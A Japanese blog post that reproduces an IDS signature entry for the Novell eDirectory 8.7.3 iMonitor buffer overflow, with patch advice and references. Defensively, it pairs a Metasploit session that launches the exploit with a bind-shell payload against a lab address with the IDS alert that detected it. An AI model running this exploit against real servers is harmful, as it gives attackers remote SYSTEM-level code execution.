つぶやき

このブログは,ご覧頂いたあなたのコンピュータが犯罪に利用されていないか?確認していただく為のひとつの手段としてご利用頂ければ幸いです。電子メール:amaterasu@job.email.ne.jp


テーマ:

Novell eDirectory iMonitor buffer overflow (HTTP_Novell_iMonitor_BO)

About this signature or vulnerability

Proventia G-Series, Proventia Desktop, Proventia Network IPS, RealSecure Server Sensor, RealSecure Network Sensor, Proventia M-Series, BlackICE Agent for Server, BlackICE PC Protection, BlackICE Server Protection, Proventia Server for Windows:

This signature detects an attempt to overflow Novell eDirectory Server iMonitor by sending a specially crafted URL



Default risk level

High

Sensors that have this signature

Proventia G-Series: XPU 24.38, Proventia Desktop: 8.0.812.1770, Proventia Network IPS: XPU 1.77, RealSecure Server Sensor: XPU 24.38, RealSecure Network Sensor: XPU 24.38, Proventia M-Series: XPU 1.77, BlackICE Agent for Server: 3.6epi, BlackICE PC Protection: 3.6cpi, BlackICE Server Protection: 3.6.cpi, Proventia Server for Windows: 1.0.914.1770

Systems affected

Windows NT: 4.0, Windows 2000: Any version, Novell eDirectory: 8.7.3, Windows 2003: Any version

Type

Unauthorized Access Attempt

Vulnerability description

Novell eDirectory is a software package that uses a Lightweight Directory Access Protocol (LDAP) directory service for integrating enterprise and eBusiness programs. Novell eDirectory version 8.7.3, when running on Microsoft Windows, is vulnerable to a buffer overflow caused by improper bounds checking in the iMonitor. A remote attacker could exploit this vulnerability to overflow a buffer and execute arbitrary code on the system with SYSTEM level privileges or possibly cause dhost.ext to crash.

How to remove this vulnerability

Upgrade to the patch for this vulnerability, as listed in Novell Technical Information Document TID10098568. See References.


References

Secunia Security Advisory: SA16393
Novell eDirectory iMonitor Buffer Overflow Vulnerability
http://secunia.com/advisories/16393/  

Novell Technical Information Document TID10098568
Buffer overflow vulnerability against eDirectory 8.7.3 imonitor on Windows
http://support.novell.com/cgi-bin/search/searchtid.cgi?/10098568.htm  

Novell Technical Information Document TID2972038
eDirectory 8.7.3 iMonitor for Win32 - TID2972038
http://support.novell.com/cgi-bin/search/searchtid.cgi?/2972038.htm  

CERT Vulnerability Note VU#213165
Novell eDirectory iMonitor vulnerable to buffer overflow
http://www.kb.cert.org/vuls/id/213165  

ISS X-Force
Novell eDirectory iMonitor buffer overflow
http://www.iss.net/security_center/static/21794.php  

CVE
CVE-2005-2551
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2551  



■実証コード

===========================

Exploit: Name Default Description
-------- ------ --------------- -----------------------------------

optional SSL Use SSL
required RHOST 192.168.221.180 The target address
optional VHOST The virtual host name of the server
required RPORT 8008 The target port

Payload: Name Default Description
-------- -------- ------- ------------------------------------------

required EXITFUNC thread Exit technique: "process", "thread", "seh"
required LPORT 4444 Listening port for bind shell

Target: Windows (ALL) - eDirectory 8.7.3 iMonitor

msf edirectory_imonitor(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Attempting to exploit Windows (ALL) - eDirectory 8.7.3 iMonitor
[*] Overflow request sent, sleeping for four seconds
[*] Exiting Bind Handler.

msf edirectory_imonitor(win32_bind) >


■検知

Date/Time 2006-06-18 22:26:11 JST
Tag Name HTTP_Novell_iMonitor_BO
Alert Name HTTP_Novell_iMonitor_BO
Severity High
Observance Type Intrusion Detection
Combined Event Count 1
Cleared Flag false
Target IP Address 192.168.37.180
Target Object Name 8008
Target Object Type Target Port
Source IP Address 192.168.221.11
SourcePort Name 1633
Sensor IP Address 10.4.6.100
Sensor Name network_sensor_1
:accessed yes
:evasions uses non-ASCII characters;
:intruder-ip-addr 192.168.221.11
:intruder-port 1633
:server 192.168.221.180:8008
:URL /nds/佞7JBJ・A@GG@荘NJB屁C7J舛7FOFKKHJB傲・Fヨ@'@B櫑O廿GB澄FH'ヨHJI鋒FN桝廂G菅CB姆N妁訂僊O・@鎗@F・・GHON訪・泡OF滲GCO・・訂@C・蜂ヨGO・吏湧・ヨFNB7NF廿敦BK價鵰'ヨ趨K友僭7'@ヨ炉@O崇剞的BGB剞A・・CA只I'H'婁選'呂哲O銭・'O7N
:victim-ip-addr 192.168.37.180
:victim-port 8008
algorithm-id 2106212
IANAProtocolId 6
Packet DestinationAddress 192.168.37.180
Packet DestinationPort 8008
Packet DestinationPortName http-alt
Packet SourceAddress 192.168.221.11
Packet SourcePort 1633


AD
いいね!した人  |  リブログ(0)

AD

ブログをはじめる

たくさんの芸能人・有名人が
書いているAmebaブログを
無料で簡単にはじめることができます。

公式トップブロガーへ応募

多くの方にご紹介したいブログを
執筆する方を「公式トップブロガー」
として認定しております。

芸能人・有名人ブログを開設

Amebaブログでは、芸能人・有名人ブログを
ご希望される著名人の方/事務所様を
随時募集しております。